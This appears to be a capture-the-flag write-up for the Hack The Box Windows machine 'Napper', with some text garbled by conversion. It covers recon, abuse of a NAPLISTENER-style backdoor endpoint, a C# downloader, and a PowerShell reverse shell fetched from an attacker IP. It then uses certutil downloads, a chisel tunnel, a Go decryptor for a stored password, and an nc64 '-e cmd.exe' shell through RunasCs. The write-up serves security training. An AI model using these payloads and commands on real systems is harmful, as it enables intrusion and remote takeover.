Napper (Windows | Hard)

USER

machine ip

```
10.129.154.236
```

nman scar

```
—(kali⊛kali)-[~/Desktop]
  └$ nmap -sC -sV 10.129.154.236 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-11 15:24 EST
Nmap scan report for 10.129.154.236
Host is up (0.0080s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0
 _http-title: Did not follow redirect to https://app.napper.htb
  443/tcp open ssl/http Microsoft IIS httpd 10.0
  | tls-alpn:
  _ http/1.1
  |_http-title: Research Blog | Home
  | http-methods:
  _ Potentially risky methods: TRACE
     ssl\text{-cert}: \ Subject: \ commonName=app. \ napper. \ htb/organizationName=MLopsHub/stateOrProvinceName=California/countryName=USAM \ and \ an application of the provinceName of the pr
     Subject Alternative Name: DNS:app.napper.htb
 Not valid before: 2023-06-07T14:58:55

Not valid after: 2033-06-04T14:58:55

http-generator: Hugo 0.112.3
  |_ssl-date: 2023-11-11T20:24:44+00:00; -18s from scanner time
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| clock-skew: -18s
Service\ detection\ performed.\ Please\ report\ any\ incorrect\ results\ at\ https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 24.38 seconds
```

port 80 and 443 open

add napper.htb and app.napper.htb to /etc/hosts

ffuf to find subdomains

```
-(kali@kali)-[~/Desktop]
   └$ ffuf -c -u https://10.129.154.236/ -w SecLists/Discovery/Web-Content/common.txt -H "HOST: FUZZ.napper.htb" -fl 187
                          \\_\ \\_\ \\___/ \\_\\
\/_/ \\_/ \\__/ \\__/
                          v2.0.0-dev
                                                                         : GET
: https://10.129.154.236/
: FUZZ: /home/kali/Desktop/SecLists/Discovery/Web-Content/common.txt
     :: Method
      :: URL
      :: Wordlist
                                                                                    : Host: FUZZ.napper.htb
       :: Follow redirects : false
      :: Calibration : false
:: Timeout : 10
       :: Timeout
                                                                                : 40
                Threads
                                                                   : Response status: 200,204,301,302,307,401,403,405,500
: Response lines: 187
       ·· Matcher
     :: Filter
[Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 117ms] * FUZZ: internal
:: \ Progress: \ [4715/4715] \ :: \ Job \ [1/1] \ :: \ 641 \ req/sec \ :: \ Duration: \ [0:00:02] \ :: \ Errors: \ 0 \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \ [0:00:02] \ :: \
```

add internal.napper.htb to hosts file

dig around on app.napper.htb page and find default creds on:

```
https://app.napper.htb/posts/setup-basic-auth-powershell/
```

use default creds to log into internal.napper.htb:

Napper (Windows | Hard)

```
example:ExamplePassword
```

find these extracts on one of the web pages

```
[...] HTTP listener written in C#, which we refer to as NAPLISTENER.

Consistent with SIESTAGRAPH and other malware families developed or used by this threat,

NAPLISTENER appears designed to evade network-based forms of detection. [...]

This means that any web request to /ews/MsExgHealthCheckd/ that contains a base64-encoded .NET assembly in
the sdafwe3rwe23 parameter will be loaded and executed in memory.
It's worth noting that the binary runs in a separate process and it is not
associated with the running IIS server directly.
```

lists vulnerabilities that can be exploited

make powershell script on https://www.revshells.com/

use powershell#3(Base64) and then remove Base64 encoding (under encoding tab)

save to file called test.ps:

powershell -e JABjaGwaaQBlaG4AdAagAD0AIABOAGUAdwatAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlaG0ALgBOAGUAdAuuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwaaQBlAG4AdAoACIAMQAwAC4AMQA

create script named payload.cs

set scriptURL to (your host IP)/(name of powershell script)

```
using System;
using System Diagnostics;
using System.Net;
namespace payload
    public class Run
        public Run()
           var scriptUrl = "http://10.10.14.61/test.ps1";
           using (WebClient webClient = new WebClient())
                // Download the PowerShell script from the URL
                string scriptContent = webClient.DownloadString(scriptUrl);
                var processStartInfo = new ProcessStartInfo("powershell.exe")
                    // Pass the downloaded script content as a command
                    Arguments = scriptContent,
                    RedirectStandardOutput = true
                   RedirectStandardError = true,
                    UseShellExecute = false,
                    CreateNoWindow = true
                var process = new Process
                   StartInfo = processStartInfo
                process.Start();
       public static void Main(string[] args)
```

compile payload.cs into payload.exe

```
mcs payload.cs
```

upload payload.exe to cyberchef and convert to Base64

 $using \ template \ from \ webpage \ of \ internal. napper. htb \ (might \ actually \ be \ app.napper. htb), \ create \ python \ script \ called \ test. python \ script \ python \ pytho$

input the the Base64 encoded payload.exe as the payload

```
import requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
hosts=["napper.htb"]
```

Napper (Windows | Hard) 2

```
form_field=f"sdafwe3rwe23={requests.utils.quote(payload)}"
 for h in hosts:
     url_ssl= f"https://{h}/ews/MsExgHealthCheckd/"
         r_ssl = requests.post(url_ssl, data=form_field, verify=False)
          print(f"\{url\_ssl\} \; : \; \{r\_ssl.status\_code\} \; \{r\_ssl.headers\}")
     except KeyboardInterupt:
     except Exception as e:
          pass
set up netcat listener on port 9001
 nc -lvnp 9001
open a python server on host machine on port 80
 python3 -m http.server 80
run test.py on host machine
 python3 test.py
gives reverse shell as user on nc listener
ROOT
need .exe version because it is a windows machine*
 certutil.exe -urlcache -f http://10.10.14.61/chisel.exe chisel.exe
open a chisel server
on host machine:
 ./chisel server -p 8001 --reverse
on client machine:
  ./chisel.exe client 10.10.14.61:8001 R:1080:socks
repeat steps for user to get another reverse shell as user (just change ports in script) because the chisel server will be running on the original shell connection
found in C:\Program Files\elasticsearch-8.8.0
 elastic : oKHzjZw0EGcRxT2cux5K
unload RunasCs.exe onto client server
upload to windows\tasks\ directory*
 certutil.exe -urlcache -f http://10.10.14.61/RunasCs.exe RunasCs.exe
upload nc64.exe onto client server
upload to windows\tasks\ directory*
 certutil.exe -urlcache -f http://10.10.14.61/nc64.exe nc64.exe
need to proxychains firefox to website or change to socks5 proxy in burpsuite (need to restart browser after changing to socks5 in settings*
 https://localhost:9200/_all/_search
golang programming environment
https://go.dev/play/
```

Napper (Windows | Hard)

put script below into golang website

put in seed and blob from $\underline{\text{localhost}}$ into main function

gives password output for authentication

```
import (
     "crypto/aes"
    "crypto/cipher"
     "encoding/base64"
    "fmt"
    "log"
     "math/rand"
    "strconv"
func checkErr(err error) {
   if err != nil {
         log.Fatal(err)
func genKey(seed int) (key []byte) {
     rand.Seed(int64(seed))
for i := 0; i < 0x10; i++ {
    val := rand.Intn(0xfe)
         key = append(key, byte(val+1))
     return
func decrypt(seed int, enc []byte) (data []byte) {
   fmt.Printf("Seed: %v\n", seed)
   key := genKey(seed)
     fmt.Printf("Key: %v\n", key)
     iv := enc[:aes.BlockSize]
fmt.Printf("IV: %v\n", iv)
     data = enc[aes.BlockSize:]
    block, err := aes.NewCipher(key)
     stream := cipher.NewCFBDecrypter(block, iv)
stream.XORKeyStream(data, data)
fmt.Printf("Plaintext: %s\n", data)
     return
func main() {
     seed, err := strconv.Atoi("25758060")
     checkErr(err)
     enc, err := base64.URLEncoding.DecodeString("CQJTg2iHRI2QP_FKZMDmnpqhegey_ivqEdYBFJnYpkeUE64tvLd1fgcE4S1K36kNxWrv9MHNX_8=")
     {\sf checkErr}({\sf err})
     dec := decrypt(seed, enc)
myString := string(dec)
     fmt.Printf(myString)
```

outputs password as plaintext

open netcat listener on port 9005

```
nc -lvnp 9005
```

run on user to get root

input password output from golang script*

```
./RunasCs.exe Backup JhyEpIGwXUpbzoyLZBbbxCUrXLPmVFwbwNxhIUaA "C:\windows\tasks\nc64.exe 10.10.14.61 9005 -e cmd.exe" -t 0 -b
```

gets reverse shell as root on nc listener for port 9005

Napper (Windows | Hard)